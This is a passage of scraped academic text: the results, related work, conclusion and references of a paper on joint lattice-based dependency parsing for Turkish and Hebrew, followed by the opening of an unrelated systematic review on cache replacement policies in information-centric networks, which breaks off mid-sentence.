work for Turkish, as the surface forms of non-final IGs are all represented as underscores. 10As an experiment, we took a Turkish treebank tree and cre- ated artificial parses by attaching one token to a different head each time. All other tokens remained attached to their correct head, and segmentation is kept gold. This gave us 11 parses that contained exactly one attachment error and one parse iden- tical with the gold standard. Running TedEval on each of the proposed in Goldberg (2011) implements the same ideas without edit distance and is defined directly for dependencies. Segmentation Evaluation. We use the same token-based precision and recall to measure the quality of segmentation and morphological analysis without syntax. For a token to be correct, it has to have the same morphological analysis as the token in the gold standard to which it is aligned. We fur- thermore report word accuracy (ACCw), which is the percentage of words that received the correct seg- mentation. 5 Results Segmentation and Morphology. Table 1 shows the quality of segmentation and morphological anal- ysis. The baseline for Turkish is the Turkish morphological disambiguator by Sak et al. (2008), trained on the Turkish treebank. For Hebrew, the baseline is the disambiguated lattices provided by the SPMRL 2014 Shared Task.11 The bigram model is our own morphological disambiguator. The joint model is the full lattice parser, which has access to syntactic information. The results show that the bigram model is clearly outperforming the baselines for both languages. The feature model of the bigram model was developed on the Turkish development set, but the model also works well for Hebrew. Comparing the bigram model to the joint model shows that overall, the joint model performs better than the bigram model. How- ever, the joint model mainly scores in recall rather than in precision, the bigram model is even ahead of the joint model in precision for Hebrew. The joint model outperforms the bigram model and the base- line also in word accuracy. The results demonstrate that syntactic information is relevant to resolve am- biguity in segmentation and morphology for Turkish and Hebrew. 11 incorrect parses gave us 5 different scores. The differences are caused by the transformation of dependency trees to con- stituency trees, because the constituency trees have different edit distances compared to the gold standard. Consequently, this means that some attachment errors of the dependency parser are punished more than others in an unpredictable way. 11A description on how these lattice are produced is given in Seddah et al. (2013, page 159) 366 Turkish Hebrew data system PREC REC F1 ACCw PREC REC F1 ACCw dev BASELINE 89.59 88.14 88.86 87.97 85.99 84.07 85.02 80.30 BIGRAM MODEL 90.69 89.52 90.10 89.45 86.84 86.30 86.57 83.46 JOINT MODEL 90.80 90.22 90.51 89.94 86.68 87.49 87.08 84.67 test BASELINE 89.46 88.51 88.99 87.95 81.79 79.83 80.80 74.85 BIGRAM MODEL 89.96 89.23 89.59 88.71 84.44 83.22 83.83 79.60 JOINT MODEL 90.19 89.74 89.97 89.25 83.88 83.99 83.94 80.28 Table 1: Path selection quality. LABELED UNLABELED IGeval STRICT IGeval data system PREC REC F1 PREC REC F1 UASIG LASIG UASIG LASIG dev MATE 62.54 61.73 62.14 69.44 68.54 68.98 70.60 60.10 74.88 63.46 TURBO 63.54 62.71 63.12 70.68 69.76 70.22 72.22 61.24 76.58 64.73 PIPELINE 63.86 63.03 63.44 70.65 69.73 70.19 72.26 61.82 76.64 65.49 JOINT 64.21 63.79∗ 64.00 70.96 70.50∗ 70.73 72.66∗ 62.40 76.61 65.59 10cv MATE 63.28 62.49 62.88 70.37 69.50 69.94 71.75 61.26 75.84 64.42 TURBO 63.82 63.03 63.42 71.12 70.24 70.68 72.77 61.89 76.93 65.09 PIPELINE 64.97 64.17 64.57 71.71 70.83 71.27 73.66 63.52 77.68 66.82 JOINT 65.27 64.84† 65.06 72.05∗ 71.58† 71.82 73.93 63.85 77.74 66.83 test MATE 64.64 64.12 64.38 70.62 70.04 70.33 71.99 61.84 77.08 65.98 TURBO 65.36 64.83 65.09 71.66 71.08 71.37 73.16 62.76 78.37 67.02 PIPELINE 66.40 65.86 66.13 72.30 71.72 72.01 74.33 64.40 79.61 69.02 JOINT 67.33 66.99∗ 67.16 72.94∗ 72.58∗ 72.76 75.02 65.32 79.45 68.99 Table 2: Parsing results for Turkish. Statistically significant differences between the joint system and the pipeline system are marked with † (p < 0.01) and ∗ (p < 0.05). Significance testing was performed using the Wilcoxon Signed Rank Test (not for F1). Turkish. Table 2 presents the results of the eval- uation of the three baseline systems and the lattice parser on the Turkish data. The PIPELINE and the JOINT system give better results than the other two baselines across the board. This shows that the fea- ture set of the lattice parser is better suited to the Turkish treebank than the feature set of Mate parser and Turbo parser. It is not a surprising result though, since the lattice parser was developed for Turkish whereas the other two parsers were developed for other treebanks. The JOINT system outperforms the PIPELINE sys- tem with respect to the first three metrics. These metrics evaluate syntax, segmentation, and morpho- logical analysis jointly. Higher scores here mean that these aspects in combination have become bet- ter. The differences between the PIPELINE and the JOINT model are consistently statistically significant with respect to recall, but only in some cases with re- spect to precision. The syntactic information that is available to the joint model thus seems to improve recall rather than precision. The last two columns in Table 2 show an evalu- ation using IGeval. The IGeval metric is designed to evaluate the syntactic quality with less attention to morphological analysis and segmentation. Here, both PIPELINE and JOINT achieve very similar re- sults and none of the differences is statistical signif- icant. These results suggest that a good part of the improvements in the lattice parser occurs in the mor- phological analysis/segmentation, whereas the qual- ity of syntactic annotation basically stays the same between the pipeline and the joint model. Hebrew. The experimental results on the Hebrew data are shown in Table 3. The three baselines per- form very similarly. All three baseline systems are run on the output of the same disambiguator, which 367 means that the feature models of the parsers seem to be equally well suited to the Hebrew treebank. The feature model of the lattice parser that is used in the PIPELINE baseline was not adapted to Hebrew in any way, but was used as it was developed for the Turk- ish data. Compared to the three baselines, the joint model outperforms them for both labeled and unlabeled scores. As the only difference between PIPELINE and JOINT is the fact that the latter performs joint decoding, the results support the findings in con- stituency parsing by Tsarfaty (2006), Cohen and Smith (2007), and Goldberg and Tsarfaty (2008), namely that joint decoding is a better model for He- brew parsing. Judging from statistical significance, the JOINT model improves recall rather than preci- sion, a picture that we found for Turkish as well. LABELED UNLABELED data system PREC REC F1 PREC REC F1 dev MATE 65.41 65.00 65.20 70.65 70.21 70.43 TURBO 65.12 64.72 64.92 70.44 70.00 70.22 PIPELINE 65.64 65.23 65.44 70.65 70.21 70.43 JOINT10 66.82 67.44† 67.13 71.47 72.13∗ 71.80 test MATE 63.16 62.25 62.70 67.52 66.55 67.03 TURBO 63.06 62.16 62.61 67.27 66.31 66.79 PIPELINE 63.63 62.72 63.17 67.62 66.65 67.14 JOINT10 63.81 63.89† 63.85 67.79 67.88† 67.84 Table 3: Statistically significant differences between the joint system and the pipeline system are marked with † (p < 0.01) and ∗ (p < 0.05). Significance testing was performed using the Wilcoxon Signed Rank Test (not for F1). As described in Section 4.4, we cannot evaluate the syntax entirely independently on Hebrew, but we can eliminate the morphological level. Table 4 shows the results of the evaluation when only syn- tax and surface forms are matched. The overall pic- ture compared to the evaluation shown in Table 3 does not change, however. Also when disregarding the quality of morphology, the JOINT model outper- forms the PIPELINE, notably with respect to recall. 6 Related Work Graph-based Parsing. Our basic architecture re- sembles the joint constituency parsing and POS tag- ging model by Rush et al. (2010), but our model LABELED UNLABELED data system PREC REC F1 PREC REC F1 dev MATE 68.05 67.62 67.83 74.70 74.24 74.47 TURBO 67.97 67.54 67.75 74.58 74.12 74.35 PIPELINE 68.56 68.14 68.35 74.84 74.37 74.60 JOINT10 69.23 69.87† 69.55 74.88 75.58† 75.23 test MATE 66.17 65.22 65.69 71.62 70.60 71.11 TURBO 66.14 65.19 65.66 71.38 70.35 70.86 PIPELINE 66.81 65.85 66.33 71.82 70.79 71.30 JOINT10 66.63 66.72† 66.68 71.48 71.57† 71.52 Table 4: Parsing results for Hebrew, evaluated without morphology. Statistically significant differences between the joint system and the pipeline system are marked with †. Significance testing was performed using the Wilcoxon Signed Rank Test with p < 0.01 (not for F1). needs additional constraints to enforce agreement between the two tasks. Martins et al. (2011a) and Martins et al. (2015) show how such first-order logic constraints can be represented as subproblems in dual decomposition. Similar approaches, where such constraints are used to ensure certain proper- ties in the output structures, have been used e.g. in semantic parsing (Das et al., 2012), compressive summarization (Almeida and Martins, 2013), and joint quotation attribution and coreference resolu- tion (Almeida et al., 2014). Parsers that use dual de- composition are proposed in Koo et al. (2010) and Martins et al. (2010). From Koo et al. (2010), we adopted the idea of using the Chu-Liu-Edmonds al- gorithm to ensure tree properties in the output as well as second-order parsing with head automata. Li et al. (2011) extend several higher-order vari- ants of the Eisner decoder (Eisner, 1997) such that POS tags are predicted jointly with syntax. The complexity of their joint models increases by poly- nomials of the tag set size. Due to the dual decompo- sition approach, the complexity of our parser stays equal to the complexity of the most complex sub- problem, which is the second-order head automata in our case. Transition-based Parsing. Joint models in transition-based parsing usually introduce a variant of the shift transition that performs the additional task, e.g. it additionally predicts the POS tag and possibly morphological features of a token that is being shifted (Hatori et al., 2011; Bohnet and Nivre, 368 2012; Bohnet et al., 2013). Optimization over the joint model is achieved by beam search. To also solve the word segmentation task, several models for Chinese were proposed that parse on the level of single characters, forming words from characters with a special append transition (Hatori et al., 2012; Li and Zhou, 2012) or predicting word internal structure along with syntax (Zhang et al., 2014). To use such a transition-based system for the segmen- tation task in Turkish or Hebrew, the shift transition would have to be changed to do the opposite of the append transition in the Chinese parsers: segment an incoming token into several ones, for example based on the output of a morphological analyzer. Easy-first Parsing. Ma et al. (2012) introduce a variant of the easy-first parser (Goldberg and El- hadad, 2010a) that uses an additional operation to POS tag input tokens. The operations are ordered such that the parser can only introduce a dependency arc between two tokens that have received a POS tag already. Tratz (2013) presents a similar system for Arabic that defines several more operations to deal with segmentation ambiguity. Sampling-based Parsing. Zhang et al. (2015) present a joint model that relies on sampling and greedy hill-climbing for decoding, but allows for ar- bitrarily complex scoring functions thus opening ac- cess to global and cross-level features. Such fea- tures could be simulated in our model by adding ad- ditional factors in the form of soft constraints (con- straints with output, see Martins et al. (2015)), but this would introduce a considerable number of addi- tional factors with a notable impact on performance. Constituency Parsing. Joint models have also been investigated in constituency parsing, notably for Hebrew. Tsarfaty (2006) already discusses full joint models, but the first full parsers were presented in Cohen and Smith (2007), Goldberg and Tsar- faty (2008), and later Goldberg and Elhadad (2013). Green and Manning (2010) present a similar parser for Arabic. Among these, some authors emphasize the importance of including scores from the mor- phological model into the parsing model, whereas other models do not use them at all. In our parser, the model is trained jointly for both tasks without weighting the two tasks differently. Parsing Hebrew and Turkish. Joint models for Hebrew parsing were mostly investigated for con- stituency parsing (see above). There has been some work specifically on Hebrew dependency parsing (Goldberg and Elhadad, 2009; Goldberg and El- hadad, 2010b; Goldberg, 2011), but not in the con- text of joint models. Turkish dependency parsing was pioneered in Eryiğit and Oflazer (2006) and Eryiğit et al. (2008). They compare parsing based on inflectional groups to word-based parsing and conclude that the former is more suitable for Turkish. Çetinoğlu and Kuhn (2013) are first to discuss joint models for Turkish and present experiments for joint POS tagging and parsing, but use a pipeline to decide on segmenta- tion and morphological features. To the best of our knowledge, there currently exists no work on full lat- tice parsing for Turkish. 7 Conclusion Morphologically rich languages pose many chal- lenges to standard dependency parsing systems, one of them being that the number of tokens in the output is not always known beforehand. Solving this prob- lem in a pipeline setup leads to efficient systems but systematically excludes interaction between the lex- ical, morphological, and syntactic level of analysis. In this work, we have presented a graph-based lattice dependency parser that operates on morpho- logical lattices and simultaneously predicts a de- pendency tree and a path through the lattice. We tested the joint model on the Turkish treebank and the treebank of Modern Hebrew and demonstrated that the joint model outperforms three state-of-the- art pipeline models. We presented the first results for full lattice parsing on the Turkish treebank. The results on the Hebrew treebank corroborate findings in constituency parsing (Cohen and Smith, 2007; Goldberg and Tsarfaty, 2008). Acknowledgments We thank our anonymous reviewers for their help- ful comments. We also thank Anders Björkelund for many useful discussions. This work was funded by the Deutsche Forschungsgemeinschaft (DFG) via SFB 732, projects D2 and D8. 369 References Miguel Almeida and Andre Martins. 2013. Fast and Robust Compressive Summarization with Dual De- composition and Multi-Task Learning. In Proceed- ings of the 51st Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 196–206, Sofia, Bulgaria, August. Association for Computational Linguistics. Mariana S. C. Almeida, Miguel B. Almeida, and André F. T. Martins. 2014. A Joint Model for Quotation At- tribution and Coreference Resolution. In Proceedings of the 14th Conference of the European Chapter of the Association for Computational Linguistics, pages 39– 48, Gothenburg, Sweden, April. Association for Com- putational Linguistics. Bernd Bohnet and Joakim Nivre. 2012. A Transition- Based System for Joint Part-of-Speech Tagging and Labeled Non-Projective Dependency Parsing. In Pro- ceedings of the 2012 Joint Conference on Empirical Methods in Natural Language Processing and Com- putational Natural Language Learning, pages 1455– 1465, Jeju, South Korea. Association for Computa- tional Linguistics. Bernd Bohnet, Joakim Nivre, Igor Boguslavsky, Richrd Farkas, Filip Ginter, and Jan Haji. 2013. Joint Mor- phological and Syntactic Analysis for Richly Inflected Languages. Transactions of the Association for Com- putational Linguistics, 1:415–428. Bernd Bohnet. 2009. Efficient Parsing of Syntactic and Semantic Dependency Structures. In Proceedings of the Thirteenth Conference on Computational Natu- ral Language Learning (CoNLL 2009): Shared Task, pages 67–72, Boulder, Colorado, June. Association for Computational Linguistics. Bernd Bohnet. 2010. Very high accuracy and fast depen- dency parsing is not a contradiction. In Proceedings of the 23rd International Conference on Computational Linguistics, pages 89–97, Beijing, China. International Committee on Computational Linguistics. Xavier Carreras. 2007. Experiments with a Higher- Order Projective Dependency Parser. In Proceedings of the CoNLL Shared Task Session of EMNLP-CoNLL 2007, pages 957–961, Prague, Czech Republic, June. Association for Computational Linguistics. Özlem Çetinoğlu and Jonas Kuhn. 2013. Towards Joint Morphological Analysis and Dependency Pars- ing of Turkish. In Proceedings of the Second In- ternational Conference on Dependency Linguistics (DepLing 2013), pages 23–32, Prague, Czech Repub- lic, August. Charles University in Prague, Matfyz- press, Prague, Czech Republic. Özlem Çetinoğlu. 2014. Turkish Treebank as a Gold Standard for Morphological Disambiguation and Its Influence on Parsing. In Nicoletta Calzolari (Confer- ence Chair), Khalid Choukri, Thierry Declerck, Hrafn Loftsson, Bente Maegaard, Joseph Mariani, Asun- cion Moreno, Jan Odijk, and Stelios Piperidis, editors, Proceedings of the Ninth International Conference on Language Resources and Evaluation (LREC’14), Reykjavik, Iceland, may. European Language Re- sources Association (ELRA). Yoeng-Jin Chu and Tseng-Hong Liu. 1965. On the Shortest Arborescence of a Directed Graph. Scientia Sinica, 14(10):1396–1400. Shay B. Cohen and Noah A. Smith. 2007. Joint morpho- logical and syntactic disambiguation. In Proceedings of the 2007 Joint Conference on Empirical Methods in Natural Language Processing and Computational Natural Language Learning, pages 208–217, Prague, Czech Republic. Association for Computational Lin- guistics. Koby Crammer, Ofer Dekel, Shai Shalev-Shwartz, and Yoram Singer. 2003. Online passive-aggressive algo- rithms. In Proceedings of the 16th Annual Conference on Neural Information Processing Systems, volume 7, pages 1217–1224, Cambridge, Massachusetts, USA. MIT Press. Dipanjan Das, André F. T. Martins, and Noah A. Smith. 2012. An Exact Dual Decomposition Algorithm for Shallow Semantic Parsing with Constraints. In *SEM 2012: The First Joint Conference on Lexical and Com- putational Semantics – Volume 1: Proceedings of the main conference and the shared task, and Volume 2: Proceedings of the Sixth International Workshop on Semantic Evaluation (SemEval 2012), pages 209–217, Montréal, Canada, 7-8 June. Association for Compu- tational Linguistics. Jack Edmonds. 1967. Optimum Branchings. Jour- nal of Research of the National Bureau of Standards, 71B(4):233–240. Jason Eisner. 1997. Bilexical Grammars and a Cubic- Time Probabilistic Parser. In Proceedings of the 5th International Workshop on Parsing Technologies (IWPT), pages 54–65, MIT, Cambridge, MA, sep. Gülşen Eryiğit and Kemal Oflazer. 2006. Statistical de- pendency parsing of Turkish. In Proceedings of the 11th Conference of the European Chapter of the As- sociation for Computational Linguistics, pages 89–96, Trento, Italy. Association for Computational Linguis- tics. Gülşen Eryiğit, Joakim Nivre, and Kemal Oflazer. 2008. Dependency Parsing of Turkish. Computational Lin- guistics, 34(3):357–389. Gülşen Eryiğit, Tugay Ilbay, and Ozan Arkan Can. 2011. Multiword Expressions in Statistical Depen- dency Parsing. In Proc. of the SPMRL Workshop of IWPT, pages 45–55, Dublin, Ireland. 370 Gülşen Eryiğit. 2012. The Impact of Automatic Morpho- logical Analysis & Disambiguation on Dependency Parsing of Turkish. In Nicoletta Calzolari, Khalid Choukri, Thierry Declerck, Mehmet Uğur Doğan, Bente Maegaard, Joseph Mariani, Jan Odijk, and Ste- lios Piperidis, editors, Proceedings of the Eighth In- ternational Conference on Language Resources and Evaluation (LREC-2012), pages 1960–1965, Istanbul, Turkey, May. European Language Resources Associa- tion (ELRA). ACL Anthology Identifier: L12-1056. Yoav Freund and Robert E. Schapire. 1999. Large mar- gin classification using the perceptron algorithm. Ma- chine Learning, 37(3):277–296. Yoav Goldberg and Michael Elhadad. 2009. Hebrew Dependency Parsing: Initial Results. In Proceedings of the 11th International Conference on Parsing Tech- nologies (IWPT’09), pages 129–133, Paris, France, October. Association for Computational Linguistics. Yoav Goldberg and Michael Elhadad. 2010a. An Ef- ficient Algorithm for Easy-First Non-Directional De- pendency Parsing. In Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the Association for Computational Linguis- tics, pages 742–750, Los Angeles, California, June. Association for Computational Linguistics. Yoav Goldberg and Michael Elhadad. 2010b. Easy-First Dependency Parsing of Modern Hebrew. In Proceed- ings of the NAACL HLT 2010 First Workshop on Sta- tistical Parsing of Morphologically-Rich Languages, pages 103–107, Los Angeles, CA, USA, June. Associ- ation for Computational Linguistics. Yoav Goldberg and Michael Elhadad. 2013. Word seg- mentation, unknown-word resolution, and morpholog- ical agreement in a hebrew parsing system. Computa- tional Linguistics, 39(1):121–160. Yoav Goldberg and Reut Tsarfaty. 2008. A single gener- ative model for joint morphological segmentation and syntactic parsing. In Proceedings of the 46th Annual Meeting of the Association for Computational Linguis- tics, pages 371–379, Columbus, Ohio. Association for Computational Linguistics. Yoav Goldberg. 2011. Automatic Syntactic Processing of Modern Hebrew. Ph.D. thesis, Ben Gurion University, Beer Sheva, Israel. Spence Green and Christopher D. Manning. 2010. Bet- ter Arabic Parsing: Baselines, Evaluations, and Anal- ysis. In Proceedings of the 23rd International Con- ference on Computational Linguistics (Coling 2010), pages 394–402, Beijing, China, August. Coling 2010 Organizing Committee. Jun Hatori, Takuya Matsuzaki, Yusuke Miyao, and Jun’ichi Tsujii. 2011. Incremental Joint POS Tag- ging and Dependency Parsing in Chinese. In Proceed- ings of 5th International Joint Conference on Natu- ral Language Processing, pages 1216–1224, Chiang Mai, Thailand, November. Asian Federation of Natu- ral Language Processing. Jun Hatori, Takuya Matsuzaki, Yusuke Miyao, and Jun’ichi Tsujii. 2012. Incremental Joint Approach to Word Segmentation, POS Tagging, and Dependency Parsing in Chinese. In Proceedings of the 50th An- nual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 1045– 1053, Jeju Island, Korea, July. Association for Com- putational Linguistics. Terry Koo, Alexander M. Rush, Michael Collins, Tommi Jaakkola, and David Sontag. 2010. Dual Decomposi- tion for Parsing with Non-Projective Head Automata. In Proceedings of the 2010 Conference on Empiri- cal Methods in Natural Language Processing, pages 1288–1298, Cambridge, MA, October. Association for Computational Linguistics. Zhongguo Li and Guodong Zhou. 2012. Unified Depen- dency Parsing of Chinese Morphological and Syntactic Structures. In Proceedings of the 2012 Joint Confer- ence on Empirical Methods in Natural Language Pro- cessing and Computational Natural Language Learn- ing, pages 1445–1454, Jeju Island, Korea, July. Asso- ciation for Computational Linguistics. Zhenghua Li, Min Zhang, Wanxiang Che, Ting Liu, Wen- liang Chen, and Haizhou Li. 2011. Joint Models for Chinese POS Tagging and Dependency Parsing. In Proceedings of the 2011 Conference on Empiri- cal Methods in Natural Language Processing, pages 1180–1191, Edinburgh, Scotland, UK, July. Associa- tion for Computational Linguistics. Ji Ma, Tong Xiao, Jingbo Zhu, and Feiliang Ren. 2012. Easy-First Chinese POS Tagging and Dependency Parsing. In Proceedings of COLING 2012, pages 1731–1746, Mumbai, India, December. The COLING 2012 Organizing Committee. Andre Martins, Noah Smith, and Eric Xing. 2009. Con- cise Integer Linear Programming Formulations for De- pendency Parsing. In Proceedings of the Joint Con- ference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Lan- guage Processing of the AFNLP, pages 342–350, Sun- tec, Singapore, August. Association for Computational Linguistics. Andre Martins, Noah Smith, Eric Xing, Pedro Aguiar, and Mario Figueiredo. 2010. Turbo Parsers: Depen- dency Parsing by Approximate Variational Inference. In Proceedings of the 2010 Conference on Empirical Methods in Natural Language Processing, pages 34– 44, Cambridge, MA, October. Association for Compu- tational Linguistics. Andre Martins, Mario Figueiredo, Pedro Aguiar, Noah Smith, and Eric Xing. 2011a. An Augmented La- 371 grangian Approach to Constrained MAP Inference. In Lise Getoor and Tobias Scheffer, editors, Proceed- ings of the 28th International Conference on Machine Learning (ICML-11), ICML ’11, pages 169–176, New York, NY, USA, June. ACM. Andre Martins, Noah Smith, Mario Figueiredo, and Pe- dro Aguiar. 2011b. Dual Decomposition with Many Overlapping Components. In Proceedings of the 2011 Conference on Empirical Methods in Natural Lan- guage Processing, pages 238–249, Edinburgh, Scot- land, UK., July. Association for Computational Lin- guistics. Andre Martins, Miguel Almeida, and Noah A. Smith. 2013. Turning on the Turbo: Fast Third-Order Non- Projective Turbo Parsers. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), pages 617–622, Sofia, Bulgaria, August. Association for Computa- tional Linguistics. André F. T. Martins, Mário A. T. Figueiredo, Pedro M. Q. Aguiar, Noah A. Smith, and Eric P. Xing. 2015. AD3: Alternating Directions Dual Decomposition for MAP Inference in Graphical Models. Journal of Machine Learning Research, 16:495–545. Ryan McDonald and Fernando Pereira. 2006. On- line learning of approximate dependency parsing al- gorithms. In Proceedings of the 11th Conference of the European Chapter of the Association for Compu- tational Linguistics, pages 81–88, Trento, Italy. Asso- ciation for Computational Linguistics. Ryan McDonald, Fernando Pereira, Kiril Ribarov, and Jan Hajic. 2005. Non-Projective Dependency Parsing using Spanning Tree Algorithms. In Proceedings of Human Language Technology Conference and Confer- ence on Empirical Methods in Natural Language Pro- cessing, pages 523–530, Vancouver, British Columbia, Canada, October. Association for Computational Lin- guistics. Saul B. Needleman and Christian D. Wunsch. 1970. A general method applicable to the search for similarities in the amino acid sequence of two proteins. Journal of molecular biology, 48(3):443–453. Kemal Oflazer, Bilge Say, Dilek Zeynep Hakkani-Tür, and Gökhan Tür. 2003. Building a Turkish Tree- bank. In Anne Abeille, editor, Building and Exploiting Syntactically-annotated Corpora. Kluwer Academic Publishers, Dordrecht. Kemal Oflazer. 1994. Two-level Description of Turk- ish Morphology. Literary and Linguistic Computing, 9(2):137–148. Alexander M. Rush, David Sontag, Michael Collins, and Tommi Jaakkola. 2010. On Dual Decomposition and Linear Programming Relaxations for Natural Lan- guage Processing. In Proceedings of the 2010 Confer- ence on Empirical Methods in Natural Language Pro- cessing, pages 1–11, Cambridge, MA, October. Asso- ciation for Computational Linguistics. Haşim Sak, Tunga Güngör, and Murat Saraçlar. 2008. Turkish Language Resources: Morphological Parser, Morphological Disambiguator and Web Corpus. In Proc. of GoTAL 2008, pages 417–427. Djamé Seddah, Reut Tsarfaty, Sandra Kübler, Marie Can- dito, Jinho D. Choi, Richárd Farkas, Jennifer Fos- ter, Iakes Goenaga, Koldo Gojenola Galletebeitia, Yoav Goldberg, Spence Green, Nizar Habash, Marco Kuhlmann, Wolfgang Maier, Joakim Nivre, Adam Przepiórkowski, Ryan Roth, Wolfgang Seeker, Yan- nick Versley, Veronika Vincze, Marcin Woliński, Alina Wróblewska, and Eric Villemonte de la Clergerie. 2013. Overview of the SPMRL 2013 Shared Task: A Cross-Framework Evaluation of Parsing Morphologi- cally Rich Languages. In Proceedings of the Fourth Workshop on Statistical Parsing of Morphologically- Rich Languages, pages 146–182, Seattle, Washington, USA, October. Association for Computational Lin- guistics. Djamé Seddah, Sandra Kübler, and Reut Tsarfaty. 2014. Introducing the SPMRL 2014 Shared Task on Parsing Morphologically-rich Languages. In Proceedings of the First Joint Workshop on Statistical Parsing of Mor- phologically Rich Languages and Syntactic Analysis of Non-Canonical Languages, pages 103–109, Dublin, Ireland, August. Dublin City University. Khalil Sima’an, Alon Itai, Yoad Winter, Alon Altman, and Noa Nativ. 2001. Building a tree-bank of modern Hebrew text. Traitement Automatique des Langues, 42(2):247–380. Ben Taskar, Vassil Chatalbashev, Daphne Koller, and Carlos Guestrin. 2005. Learning Structured Predic- tion Models: A Large Margin Approach. In Proceed- ings of the 22th Annual International Conference on Machine Learning, pages 896–903, Bonn, Germany. ACM. Stephen Tratz. 2013. A Cross-Task Flexible Transi- tion Model for Arabic Tokenization, Affix Detection, Affix Labeling, POS Tagging, and Dependency Pars- ing. In Proceedings of the Fourth Workshop on Sta- tistical Parsing of Morphologically-Rich Languages, pages 34–45, Seattle, Washington, USA, October. As- sociation for Computational Linguistics. Reut Tsarfaty, Djamé Seddah, Yoav Goldberg, Sandra Kuebler, Yannick Versley, Marie Candito, Jennifer Foster, Ines Rehbein, and Lamia Tounsi. 2010. Sta- tistical Parsing of Morphologically Rich Languages (SPMRL) What, How and Whither. In Proceedings of the NAACL HLT 2010 First Workshop on Statistical Parsing of Morphologically-Rich Languages, pages 1– 372 12, Los Angeles, CA, USA, June. Association for Computational Linguistics. Reut Tsarfaty, Joakim Nivre, and Evelina Andersson. 2012. Joint Evaluation of Morphological Segmen- tation and Syntactic Parsing. In Proceedings of the 50th Annual Meeting of the Association for Compu- tational Linguistics (Volume 2: Short Papers), pages 6–10, Jeju Island, Korea, July. Association for Com- putational Linguistics. Reut Tsarfaty. 2006. Integrated Morphological and Syn- tactic Disambiguation for Modern Hebrew. In Pro- ceedings of the COLING/ACL 2006 Student Research Workshop, pages 49–54, Sydney, Australia, July. As- sociation for Computational Linguistics. Meishan Zhang, Yue Zhang, Wanxiang Che, and Ting Liu. 2014. Character-Level Chinese Dependency Parsing. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (Vol- ume 1: Long Papers), pages 1326–1336, Baltimore, Maryland, June. Association for Computational Lin- guistics. Yuan Zhang, Chengtao Li, Regina Barzilay, and Kareem Darwish. 2015. Randomized Greedy Inference for Joint Segmentation, POS Tagging and Dependency Parsing. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Tech- nologies, pages 42–52, Denver, Colorado, May–June. Association for Computational Linguistics. 373 374 work_tw4wakfkzbfmvcyhbrwr7qmcc4 ---- Contextual dimensions for cache replacement schemes in information-centric networks: a systematic review Contextual dimensions for cache replacement schemes in information- centric networks: a systematic review Stéfani Pires1,2, Artur Ziviani3 and Leobino N. Sampaio1 1 Department of Computer Science, Federal University of Bahia (UFBA), Salvador, Brazil 2 Federal Institute of Bahia (IFBA), Salvador, Brazil 3 National Laboratory for Scientific Computing (LNCC), Petrópolis, Brazil ABSTRACT In recent years, information-centric networks (ICNs) have gained attention from the research and industry communities as an efficient and reliable content distribution network paradigm, especially to address content-centric and bandwidth-needed applications together with the heterogeneous requirements of emergent networks, such as the Internet of Things (IoT), Vehicular Ad-hoc NETwork (VANET) and Mobile Edge Computing (MEC). In-network caching is an essential part of ICN architecture design, and the performance of the overall network relies on caching policy efficiency. Therefore, a large number of cache replacement strategies have been proposed to suit the needs of different networks. The literature extensively presents studies on the performance of the replacement schemes in different contexts. The evaluations may present different variations of context characteristics leading to different impacts on the performance of the policies or different results of most suitable policies. Conversely, there is a lack of research efforts to understand how the context characteristics influence policy performance. In this direction, we conducted an extensive study of the ICN literature through a Systematic Literature Review (SLR) process to map reported evidence of different aspects of context regarding the cache replacement schemes. Our main findings contribute to the understanding of what is a context from the perspective of cache replacement policies and the context characteristics that influence cache behavior. We also provide a helpful classification of policies based on context dimensions used to determine the relevance of contents. Further, we contribute with a set of cache-enabled networks and their respective context characteristics that enhance the cache eviction process. Subjects Computer Networks and Communications, Emerging Technologies Keywords Information-centric network, Cache replacement policy, Context awareness INTRODUCTION The Internet architecture was originally designed in a host-centric paradigm to support end-to-end communication. This model struggles to face key communication requirements of modern network applications such as high content distribution, node’s mobility, and network scalability. Therefore, researchers have devoted effort studying future Internet architectures as alternatives to the IP’s host-centric model. The current practice moves forward to a more content-centric approach since the massive Internet usage is to disseminate content regardless of its location. Information-centric networking How to cite this article Pires S, Ziviani A, Sampaio LN. 2021. Contextual dimensions for cache replacement schemes in information- centric networks: a systematic review. PeerJ Comput. Sci. 7:e418 DOI 10.7717/peerj-cs.418 Submitted 9 November 2020 Accepted 7 February 2021 Published 11 March 2021 Corresponding author Leobino N. Sampaio, leobino@ufba.br Academic editor Arun Somani Additional Information and Declarations can be found on page 36 DOI 10.7717/peerj-cs.418 Copyright 2021 Pires et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.418 mailto:leobino@�ufba.�br https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.418 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ (ICN) (Ahlgren et al., 2012) is one of such initiatives. ICN is a content-centric network communication model that stand out as potential candidate to substitute the current TCP/IP model (Rahman et al., 2020). It consists of a receiver-driven networking model that focuses on the distribution and retrieval of contents through a publish-subscribe paradigm. In ICNs, a content request is based on the content’s name, not on its location, such as the content provider’s IP address. Contents should have unique names, and any network node with the content can respond to the request. To this end, ICN replicates content in a distributed way in Cache-enabled Routers (CRs) over the network that are located closer to the user. Therefore, delivering the closest content copies to the user saves communication resources, thus reducing network congestion, server loads, and access latency while providing better Quality of Service (QoS) and Quality of Experience (QoE) levels. In addition, beyond the benefits of in-network caching, decoupling the content delivery process from the content location brings native support to mobility and multicast packet forwarding. Content-Centric Networking (CCN) and its successor Named-Data Networking (NDN) (Zhang et al., 2010) are examples of initiatives implementing ICN concepts. In general, any network device can potentially work as a CR with a Content Store (CS) data structure to implement the cache service. The performance of CS plays a vital role in the overall packet forwarding engine to guarantee high-speed packet processing of ICN architectures. According to Pan, Huang & Li (2017), Pan et al. (2019), the performance bottleneck of the packet forwarding systems relies on CS operation and should be the focus of ICN optimization strategies. This way, ICN-based initiatives strongly rely on cache replacement policies to manage the CS and keep relevant content available to the users. Least Recently Used (LRU) and Least Frequently Used (LFU) (Ioannou & Weber, 2016) 